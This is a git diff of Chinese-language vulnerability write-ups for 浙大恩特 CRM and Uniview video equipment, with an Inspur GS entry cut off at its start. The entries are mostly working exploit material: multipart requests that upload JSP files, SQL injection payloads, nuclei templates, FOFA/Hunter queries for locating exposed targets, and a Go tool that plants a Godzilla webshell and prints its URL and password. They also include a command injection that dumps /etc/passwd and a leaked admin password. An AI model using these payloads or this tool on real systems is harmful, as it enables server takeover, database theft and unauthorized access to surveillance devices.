+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/nhFAeXcr4y8xhjuV/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-756266.png)
+
+# 四、漏洞复现
+```plain
+POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum&fileName=stc.jsp&strAffixStr&oprfilenam=null&gesnum HTTP/1.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 575
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="oprfilenam"
+
+null
+--00content0boundary00
+Content-Disposition: form-data; name="uploadflg"
+
+0
+--00content0boundary00
+Content-Disposition: form-data; name="strAffixStr"
+
+
+--00content0boundary00
+Content-Disposition: form-data; name="selfilenam"
+
+
+--00content0boundary00
+Content-Disposition: form-data; name="uploadfile"; filename="stc.jsp"
+Content-Type: image/png
+
+<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
+--00content0boundary00--
+```
+
+![1706508362663-ac7d958a-027b-4f36-9e67-183cc0b2540e.png](./img/nhFAeXcr4y8xhjuV/1706508362663-ac7d958a-027b-4f36-9e67-183cc0b2540e-024310.png)
+
+上传文件位置
+
+```plain
+GET /enterdoc/Machord/stc.jsp HTTP/1.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1706508460084-9c5cdce9-bc55-4c59-b11d-dab02bb03a17.png](./img/nhFAeXcr4y8xhjuV/1706508460084-9c5cdce9-bc55-4c59-b11d-dab02bb03a17-109299.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ey7q3elsbgbv3mnc>
\ No newline at end of file
diff --git a/浙大恩特CRMsaveAttaFile任意文件上传漏洞.md b/浙大恩特CRMsaveAttaFile任意文件上传漏洞.md
new file mode 100644
index 0000000..615243d
--- /dev/null
+++ b/浙大恩特CRMsaveAttaFile任意文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 浙大恩特CRM saveAttaFile任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM saveAttaFile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/oovIHLC9eb_VVrHx/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-785075.png)
+
+# 四、漏洞复现
+```plain
+POST /entsoft/MailAction.entphone;.js?act=saveAttaFile HTTP/1.1
+Host: xx.xx.xx.xx
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
+Content-Length: 179
+
+------WebKitFormBoundarye8FPHsIAq9JN8j2A
+Content-Disposition: form-data; name="file";filename="stc.jsp"
+Content-Type: image/jpeg
+
+stc
+------WebKitFormBoundarye8FPHsIAq9JN8j2A--
+```
+
+![1700315054770-73ab7304-cc2e-4a4a-9440-9b8d3e075afe.png](./img/oovIHLC9eb_VVrHx/1700315054770-73ab7304-cc2e-4a4a-9440-9b8d3e075afe-202530.png)
+
+根据响应获取上传文件位置
+
+```plain
+/enterdoc/EnterMail/20231118/2023111821425069561254581/stc.jsp
+```
+
+![1700315092549-a07f0b64-c27f-4a23-8e23-a5e4f23e6e8e.png](./img/oovIHLC9eb_VVrHx/1700315092549-a07f0b64-c27f-4a23-8e23-a5e4f23e6e8e-514982.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/eh97kwtudqbrgx9n>
\ No newline at end of file
diff --git a/浙大恩特CRMsaveFileByPhone任意文件上传漏洞.md b/浙大恩特CRMsaveFileByPhone任意文件上传漏洞.md
new file mode 100644
index 0000000..5d173d5
--- /dev/null
+++ b/浙大恩特CRMsaveFileByPhone任意文件上传漏洞.md
@@ -0,0 +1,55 @@
+# 浙大恩特CRM saveFileByPhone任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM saveFileByPhone存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/m5SQOJdEFI4o4V07/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-943390.png)
+
+# 四、漏洞复现
+```java
+POST /entsoft/ProductAction.entphone;.js?method=saveFileByPhone&goonum=954572337&filename=usnw9.jsp&imageData=Ijwlb3V0LnByaW50KDEyNTQxMjU2Mik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPiI= HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
+Content-Length: 4
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+
+test
+```
+
+![1703401674950-b3f8a679-e77e-4c9e-bf22-6a23f8f5fdd5.png](./img/m5SQOJdEFI4o4V07/1703401674950-b3f8a679-e77e-4c9e-bf22-6a23f8f5fdd5-885837.png)
+
+```java
+Ijwlb3V0LnByaW50KDEyNTQxMjU2Mik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPiI=
+```
+
+![1703401771766-b3589322-1fb9-4c79-86d3-a6d5e357d028.png](./img/m5SQOJdEFI4o4V07/1703401771766-b3589322-1fb9-4c79-86d3-a6d5e357d028-381143.png)
+
+上传文件位置
+
+```java
+/entsoft/image/goocodimg/goodoc/954572337/usnw9.jsp;.js
+```
+
+![1703401707921-384444ad-1b9e-4257-974f-61b976f5bb4d.png](./img/m5SQOJdEFI4o4V07/1703401707921-384444ad-1b9e-4257-974f-61b976f5bb4d-650115.png)
+
+nuclei脚本
+
+[浙大恩特客户资源管理系统-productaction-entphone--任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145337-f07f5255-5e64-4561-a65f-567e7b6375d4.yaml)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ffdm30fuhx2pn2ih>
\ No newline at end of file
diff --git a/浙大恩特CRMzipFileUpload任意文件上传漏洞.md b/浙大恩特CRMzipFileUpload任意文件上传漏洞.md
new file mode 100644
index 0000000..5522ea5
--- /dev/null
+++ b/浙大恩特CRMzipFileUpload任意文件上传漏洞.md
@@ -0,0 +1,50 @@
+# 浙大恩特CRM zipFileUpload任意文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM是由浙江大学恩智浙大科技有限公司推出的客户关系管理（CRM）系统。该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。浙大恩特CRM zipFileUpload任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">浙大恩特CRM</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="浙大恩特 CRM"`
++ 特征
+
+![1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a.png](./img/okHuxnU_FN0k5qU4/1700034640158-a0b751ed-9499-471d-aef1-96b75913aa5a-432544.png)
+
+# 四、漏洞复现
+```java
+POST /entsoft/CrmBasicAction.entcrm?method=zipFileUpload&c_transModel=old HTTP/1.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2657.7 Safari/537.36
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 260
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="../../stc.jsp"
+Content-Type: application/zip
+
+<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
+--00content0boundary00--
+```
+
+![1704943891516-566c0363-ef56-4bad-b296-055023951a79.png](./img/okHuxnU_FN0k5qU4/1704943891516-566c0363-ef56-4bad-b296-055023951a79-284623.png)
+
+根据回显拼接上传文件位置
+
+```java
+/enterdoc/dao/2024011111284104541134657/stc.jsp
+```
+
+![1704943976538-ac2f6799-9ce4-41dd-b52a-2c7a0d7fc29a.png](./img/okHuxnU_FN0k5qU4/1704943976538-ac2f6799-9ce4-41dd-b52a-2c7a0d7fc29a-011387.png)
+
+[zhedaente-entsoft-fileupload-CrmBasicAction.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222145291-128bd578-1b6b-45b2-9d79-58ca0ab390b2.yaml)
+
+
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vw1xptpqmd5guxwf>
\ No newline at end of file
diff --git a/浙大恩特客户资源管理系统-文件上传和sql注入漏洞.md b/浙大恩特客户资源管理系统-文件上传和sql注入漏洞.md
new file mode 100644
index 0000000..bf890f2
--- /dev/null
+++ b/浙大恩特客户资源管理系统-文件上传和sql注入漏洞.md
@@ -0,0 +1,240 @@
+## 浙大恩特客户资源管理系统 文件上传和sql注入漏洞
+
+## 特征
+```
+app.name="浙大恩特 CRM"
+app="浙大恩特客户资源管理系统"
+```
+
+## SQL注入
+```yaml
+id: enter-T0140_editAction-api-sqli
+
+info:
+  name: 浙大恩特客户资源管理系统T0140_editAction.entweb;.js接口sql注入漏洞
+  author: YGnight
+  severity: high
+  description: description
+  reference:
+    - https://
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="浙大恩特客户资源管理系统"
+
+
+requests:
+  - raw:
+      - |+
+        GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1 HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+        Accept-Encoding: gzip, deflate, br
+        Connection: close
+        Cookie: JSESSIONID=1DAEEF5E703FF40871BD44A67C1EEDD5; JSESSIONID=2C6DAAA80F315B114CD65C9DA80D8D8C
+        Upgrade-Insecure-Requests: 1
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - '0'
+
+```
+
+## 文件上传1
+```yaml
+id: enter-machord_doc-api-fileupload
+
+info:
+  name: 浙大恩特客户资源管理系统machord_doc.jsp;.js接口任意文件上传
+  author: YGnight
+  severity: high
+  description: description
+  reference:
+    - https://
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="浙大恩特客户资源管理系统"
+
+
+requests:
+  - raw:
+      - |-
+        POST /entsoft_en/Storage/machord_doc.jsp;.js?formID=upload&machordernum=&fileName=night.jsp&strAffixStr=&oprfilenam=null&gesnum= HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0  uacq
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        Content-Type: multipart/form-data; boundary=----4225820000370152680749129212
+        Content-Length: 548
+
+        ------4225820000370152680749129212
+        Content-Disposition: form-data; name="oprfilenam"
+
+        null
+        ------4225820000370152680749129212
+        Content-Disposition: form-data; name="uploadflg"
+
+        0
+        ------4225820000370152680749129212
+        Content-Disposition: form-data; name="strAffixStr"
+
+
+        ------4225820000370152680749129212
+        Content-Disposition: form-data; name="selfilenam"
+
+
+        ------4225820000370152680749129212
+        Content-Disposition: form-data; name="uploadfile"; filename="night.jsp"
+        Content-Type: image/png
+
+        night
+        ------4225820000370152680749129212--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - 'night.jsp'
+```
+
+## 文件上传2
+```go
+package main
+
+import (
+        "bytes"
+        "crypto/md5"
+        "crypto/tls"
+        "encoding/json"
+        "fmt"
+        "github.com/hpifu/go-kit/hflag"
+        "github.com/liushuochen/gotable"
+        "github.com/thanhpk/randstr"
+        "io/ioutil"
+        "mime/multipart"
+        "net/http"
+        "os"
+        "strings"
+        "time"
+)
+
+type Resutl struct {
+        VisitRoot string `json:"visitRoot"`
+        FileName  string `json:"fileName"`
+        Path      string `json:"path"`
+        IsImage   bool   `json:"isImage"`
+        Msg       string `json:"msg"`
+}
+
+func main() {
+        context, password, key := initGodZillaShell()
+        str := gethost()
+        s := exploit(str, context)
+        shellURL := strings.Replace(str+s, "//ent", "/ent", 1)
+        tb, _ := gotable.Create("ShellURL", "ShellPass", "ShellKey")
+        _ = tb.AddRow([]string{
+                shellURL, password, key,
+        })
+        fmt.Println(tb)
+}
+
+func initGodZillaShell() (shellContext, shellPassword, shellKey string) {
+        password := randstr.Hex(12)
+        safeKey := randstr.Hex(6)
+        md5Key := fmt.Sprintf("%x", md5.Sum([]byte(safeKey)))[0:16]
+        shellContent := "<%! String xc=\"" + md5Key + "\"; String pass=\"" + password + "\"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\"MD5\");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName(\"java.util.Base64\");Object Encoder = base64.getMethod(\"getEncoder\", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\"encodeToString\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Encoder\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod(\"encode\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName(\"java.util.Base64\");Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(\"sun.misc.BASE64Decoder\"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute(\"payload\")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}\n%>"
+        return shellContent, password, safeKey
+}
+
+func gethost() string {
+        hflag.AddFlag("target", "浙大恩特地址", hflag.Required(), hflag.Shorthand("t"))
+        if err := hflag.Parse(); err != nil {
+                fmt.Println(hflag.Usage())
+                os.Exit(0)
+        }
+        return hflag.GetString("target")
+}
+func cli() *http.Client {
+        c := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}
+        c.Timeout = time.Second * 15
+        return c
+}
+
+func exploit(t, s string) string {
+        client := cli()
+        buffer := &bytes.Buffer{}
+        writer := multipart.NewWriter(buffer)
+        filename := randstr.Hex(8) + ".jsp"
+        _, _ = writer.CreateFormFile("file", filename)
+        _, _ = buffer.WriteString(s)
+        _ = writer.Close()
+        target := strings.Replace(t+"/entsoft/MailAction.entphone;.js?act=saveAttaFile", "//en", "/en", 1)
+        request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String()))
+        request.Header.Set("Content-Type", writer.FormDataContentType())
+        request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36")
+        do, _ := client.Do(request)
+        defer func() {
+                _ = do.Body.Close()
+        }()
+        all, _ := ioutil.ReadAll(do.Body)
+        var result Resutl
+        _ = json.Unmarshal(all, &result)
+        if result.Msg != "上传成功" {
+                fmt.Println("上传失败了")
+                os.Exit(0)
+        }
+        split := strings.Split(result.VisitRoot, "null")
+        return split[1]
+}
+
+```
+## 文件上传3
+```
+
+POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=plugins.jsp HTTP/1.1
+Host: xxxxxxxx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0  uacq
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 8
+
+1111
+```
+
+## 文件上传4
+```
+
+POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0  uacq
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A
+Content-Length: 203
+
+------WebKitFormBoundarye8FPHsIAq9JN8j2A
+Content-Disposition: form-data; name="file";filename="as.jsp"
+Content-Type: image/jpeg
+
+<%out.print("test");%>
+------WebKitFormBoundarye8FPHsIAq9JN8j2A--
+```
diff --git a/浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞.md b/浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞.md
new file mode 100644
index 0000000..0358a84
--- /dev/null
+++ b/浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞
+
+浙大恩特客户资源管理系统Quotegask_editAction存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="浙大恩特客户资源管理系统"
+```
+
+## poc
+
+```javascript
+GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+user--+RMMS&method=goonumIsExist HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+Content-Length: 34
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+```
+
diff --git a/浙江宇视媒体服务器-user-信息泄露漏洞.md b/浙江宇视媒体服务器-user-信息泄露漏洞.md
new file mode 100644
index 0000000..13e9153
--- /dev/null
+++ b/浙江宇视媒体服务器-user-信息泄露漏洞.md
@@ -0,0 +1,34 @@
+# 浙江宇视媒体服务器-user-信息泄露漏洞
+
+### 一、漏洞描述
+浙江宇视科技有限公司创立于2011年，是一家全球公共安全和智能交通的解决方案提供商。
+
+浙江宇视科技有限公司转码服务器配置管理系统存在密码漏洞，攻击者可利用该漏洞登录后台。
+
+### 二、影响版本
+宇视转码服务器
+
+### 三、资产测绘
+fofa: body="images/a_fill_login_right_a.gif" 
+
+hunter: app.name=="Uniview 宇视媒体服务器"  
+
+界面
+
+![1714987281244-1d5f2027-bfb1-42de-950f-d29610bbd967.png](./img/4oh0GhEEmgLWqzD7/1714987281244-1d5f2027-bfb1-42de-950f-d29610bbd967-091627.png)
+
+### 四、漏洞复现
+```plain
+/user.table
+```
+
+![1714987215387-1c76dcb5-ff4f-4283-bad4-eae48ed6b024.png](./img/4oh0GhEEmgLWqzD7/1714987215387-1c76dcb5-ff4f-4283-bad4-eae48ed6b024-201161.png)使用MD5解密，密码为Admin_123
+
+![1714987514450-f760a7a9-25d7-42a5-b3eb-289504a3bd7b.png](./img/4oh0GhEEmgLWqzD7/1714987514450-f760a7a9-25d7-42a5-b3eb-289504a3bd7b-684386.png)后台界面
+
+![1714987065893-3b381dd0-d9b8-41ce-9ed3-a1f75855f8ce.png](./img/4oh0GhEEmgLWqzD7/1714987065893-3b381dd0-d9b8-41ce-9ed3-a1f75855f8ce-848576.png)
+
+
+
+> 更新: 2024-06-17 09:18:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fmgc1li99c5o7pm4>
\ No newline at end of file
diff --git a/浙江宇视科技视频监控main-cgi密码泄露漏洞.md b/浙江宇视科技视频监控main-cgi密码泄露漏洞.md
new file mode 100644
index 0000000..3a08cbe
--- /dev/null
+++ b/浙江宇视科技视频监控main-cgi密码泄露漏洞.md
@@ -0,0 +1,26 @@
+# 浙江宇视科技视频监控main-cgi密码泄露漏洞
+
+### 一、漏洞描述
+<font style="color:rgb(62, 62, 62);">宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机，它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术，具有高清晰度、低照度、宽动态等特点，能够提供高质量的视频图像。该系统main-cgi接口处存在信息泄露漏洞，可以获取账号密码</font>
+
+### 二、影响版本
+uniview-视频监控
+
+### 三、资产测绘
+fofa：app="uniview-视频监控"
+
+特征：
+
+![1708565407817-95f2e1e3-c9e8-4be1-92cd-e92186ec8b04.png](./img/-6QP_htt3rwYLJX_/1708565407817-95f2e1e3-c9e8-4be1-92cd-e92186ec8b04-838726.png)
+
+### 四、漏洞复现
+```plain
+/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}
+```
+
+![1708565517673-5422b422-875e-4092-a261-6e86a1419ec6.png](./img/-6QP_htt3rwYLJX_/1708565517673-5422b422-875e-4092-a261-6e86a1419ec6-688787.png)![1708565528046-ba2ea20d-a3b0-4d49-9a3f-7c4ac24001ac.png](./img/-6QP_htt3rwYLJX_/1708565528046-ba2ea20d-a3b0-4d49-9a3f-7c4ac24001ac-355015.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bky3gsuwp052gmtn>
\ No newline at end of file
diff --git a/浙江宇视网络视频录像机LogReport.php远程命令执行.md b/浙江宇视网络视频录像机LogReport.php远程命令执行.md
new file mode 100644
index 0000000..790a271
--- /dev/null
+++ b/浙江宇视网络视频录像机LogReport.php远程命令执行.md
@@ -0,0 +1,46 @@
+# 浙江宇视网络视频录像机 LogReport.php 远程命令执行
+
+# 一、漏洞简介
+浙江宇视科技有限公司(宇视uniview)创业于2011年,宇视是一家全球公共安全和智能交通的解决方案提供商,以可视、智慧、物联产品技术为核心的引领者。浙江宇视科技 网络视频录像机系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限。
+
+# 二、影响版本
++ 浙江宇视网络视频录像机
+
+# 三、资产测绘
++ hunter`web.body="Alarm"&&web.body="白牌定制"`
++ 特征
+
+![1702872611878-f3a32d8c-3739-407e-8635-dc2a7696e64a.png](./img/v0B50UD5k9xLwMVe/1702872611878-f3a32d8c-3739-407e-8635-dc2a7696e64a-556788.png)
+
+# 四、漏洞复现
+```plain
+GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3bcat%20/etc/passwd%3eqwer123.txt HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate
+```
+
+![1702872649040-2b06f613-e06a-4ce0-943e-0aeb713dd3be.png](./img/v0B50UD5k9xLwMVe/1702872649040-2b06f613-e06a-4ce0-943e-0aeb713dd3be-561337.png)
+
+获取命令执行结果
+
+```plain
+GET /Interface/LogReport/qwer123.txt HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+Connection: close
+Cookie: PHPSESSID=854b7f8a6d3fb343740627484f62886e
+Accept-Encoding: gzip, deflate
+```
+
+![1702872685034-9791e017-0e03-4589-905e-fe8f68825258.png](./img/v0B50UD5k9xLwMVe/1702872685034-9791e017-0e03-4589-905e-fe8f68825258-859585.png)
+
+nuclei脚本
+
+[yushi-isc-logreport-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231772-32bf72bc-329e-4b6b-b589-87e622a98850.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fywx9ig1g1f4g42w>
\ No newline at end of file
diff --git a/浪潮GS企业管理软件xtdysrv存在反序列化漏洞.md b/浪潮GS企业管理软件xtdysrv存在反序列化漏洞.md
new file mode 100644
index 0000000..81c00a1
--- /dev/null
+++ b/浪潮GS企业管理软件xtdysrv存在反序列化漏洞.md
@@ -0,0 +1,43 @@
+# 浪潮GS企业管理软件xtdysrv存在反序列化漏洞
+
+# 一、漏洞简介
